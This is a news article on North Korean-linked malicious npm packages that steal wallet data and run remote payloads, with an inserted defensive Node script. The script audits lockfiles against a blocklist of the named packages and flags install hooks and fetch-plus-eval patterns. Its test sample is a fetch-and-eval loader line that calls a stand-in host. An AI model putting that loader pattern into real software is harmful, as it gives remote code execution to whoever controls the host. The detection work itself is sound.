A recent surge in malicious activity involving North Korean-linked threat groups has been identified by cybersecurity researchers, revealing a coordinated campaign targeting the npm ecosystem.
The campaign began on August 12, 2024, and involved publishing malicious npm packages designed to infiltrate developer environments and steal sensitive data.
The newly discovered packages, including temp-etherscan-api, ethersscan-api and telegram-con, exhibit sophisticated tactics such as multi-stage obfuscated JavaScript that downloads additional malware from remote servers.
Malicious npm Packages
According to a blog post published by Phylum today, the malware includes Python scripts and a full Python interpreter, which search for data in cryptocurrency wallet browser extensions while establishing persistence on the affected systems. Another package, qq-console, is attributed to a known North Korean campaign named “Contagious Interview.”
Researchers identified another package, helmet-validate, published on August 23, 2024, which employs a different attack method. It inserts JavaScript code that retrieves and executes malicious code from a remote endpoint, ipcheck[.]cloud. This domain is linked to previous North Korean operations, including fake job campaigns using the mirotalk[.]net domain, highlighting a pattern of recurring tactics.
The most recent package, sass-notification, was published on August 27, 2024, and is linked to the “Moonstone Sleet” campaign. This package uses obfuscated JavaScript to run scripts that download, decrypt and execute remote payloads while removing traces of malicious activity, leaving behind what appears to be harmless software.
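For a developer who wants to check their own projects against the packages named above, the following Node script is an added example (it is not Phylum's tooling and contains no code from the packages discussed). It audits a package-lock.json and the installed package manifests offline, flagging dependencies on a blocklist built from the package names in this article, dependencies that declare npm lifecycle scripts (which run automatically during `npm install`), and source files that combine a network fetch with dynamic code execution, the "retrieve and execute from a remote endpoint" pattern described for helmet-validate. The lockfile contents, manifests, version numbers, the lifecycle script command and the source snippet are constructed for the demonstration and are hypothetical; only the package names come from the article.

```javascript
// Added example, not code from Phylum or from the article.
// Blocklist built from the package names reported in the article.
const BLOCKLIST = new Set([
  'temp-etherscan-api', 'ethersscan-api', 'telegram-con',
  'qq-console', 'helmet-validate', 'sass-notification',
]);

// Lifecycle scripts npm runs during install without any action by the developer.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Constructed lockfileVersion 3 document (versions and dependency tree are hypothetical).
const sampleLock = {
  name: 'example-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'example-app' },
    'node_modules/express': { version: '4.19.2' },
    'node_modules/helmet-validate': { version: '1.0.3' },
    'node_modules/express/node_modules/telegram-con': { version: '0.0.1' },
  },
};

// Constructed package.json manifests keyed by the same node_modules paths.
const sampleManifests = {
  'node_modules/express': { name: 'express', version: '4.19.2', scripts: { test: 'mocha' } },
  'node_modules/helmet-validate': {
    name: 'helmet-validate', version: '1.0.3',
    scripts: { postinstall: 'node lib/setup.js' }, // hypothetical install hook
  },
  'node_modules/express/node_modules/telegram-con': { name: 'telegram-con', version: '0.0.1' },
};

// Constructed stand-in for a fetch-and-eval loader; the host is a reserved .invalid name.
const sampleSource =
  'const https=require("https");' +
  'https.get("https://loader.example.invalid/p",r=>{let d="";' +
  'r.on("data",c=>d+=c);r.on("end",()=>eval(d));});';

// 'node_modules/a/node_modules/@s/b' -> '@s/b' (nested and scoped paths both handled)
function packageNameFromPath(lockPath) {
  const parts = lockPath.split('node_modules/');
  return parts[parts.length - 1];
}

// Every installed package whose name is on the blocklist, wherever it sits in the tree.
function findBlocklisted(lock, blocklist = BLOCKLIST) {
  const hits = [];
  for (const [lockPath, entry] of Object.entries(lock.packages || {})) {
    if (lockPath === '') continue; // the root project itself
    const name = packageNameFromPath(lockPath);
    if (blocklist.has(name)) hits.push({ path: lockPath, name, version: entry.version });
  }
  return hits;
}

// Every installed package that declares an install-time lifecycle script.
function findInstallHooks(manifests) {
  const hits = [];
  for (const [lockPath, manifest] of Object.entries(manifests)) {
    const scripts = manifest.scripts || {};
    for (const hook of INSTALL_HOOKS) {
      if (hook in scripts) {
        hits.push({ path: lockPath, name: manifest.name, hook, command: scripts[hook] });
      }
    }
  }
  return hits;
}

// Heuristic indicators: a file matching both 'network' and 'dynamic-exec'
// deserves manual review, not an automatic verdict.
const INDICATORS = {
  network: /\b(?:https?\.(?:get|request)|fetch|axios|net\.connect)\s*\(/,
  'dynamic-exec': /\b(?:eval|Function|vm\.runInThisContext|vm\.runInNewContext)\s*\(/,
  'child-process': /\bchild_process\b|\bexecSync?\s*\(|\bspawn\s*\(/,
};

// Returns the names of the indicators present in the source text.
function scanSourceForRemoteExec(src) {
  return Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(src));
}

function auditLock(lock, manifests) {
  return { blocklisted: findBlocklisted(lock), installHooks: findInstallHooks(manifests) };
}

console.log(JSON.stringify(auditLock(sampleLock, sampleManifests), null, 2));
console.log('sampleSource indicators:', scanSourceForRemoteExec(sampleSource));
```

In a real project, `sampleLock` would be `JSON.parse` of package-lock.json and `sampleManifests` would be read from each `node_modules/.../package.json`; running `npm install --ignore-scripts` first lets the audit complete before any lifecycle hook executes. The regex indicators are deliberately coarse and will match legitimate packages, so treat a match as a prompt to read the file, not as proof of compromise.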
Increasing Exploitation of npm By Threat Actors
Phylum warned these attacks underscore the increasing exploitation of npm by threat actors to compromise developer systems.
“The diversity and simultaneous deployment of these attack vectors reveal a coordinated and relentless campaign by North Korean-aligned threat actors,” the company said.
“These adversaries continuously exploit the inherent trust in the npm ecosystem to compromise developers, infiltrate companies and steal cryptocurrency or any other assets that could lead to illicit financial gains.”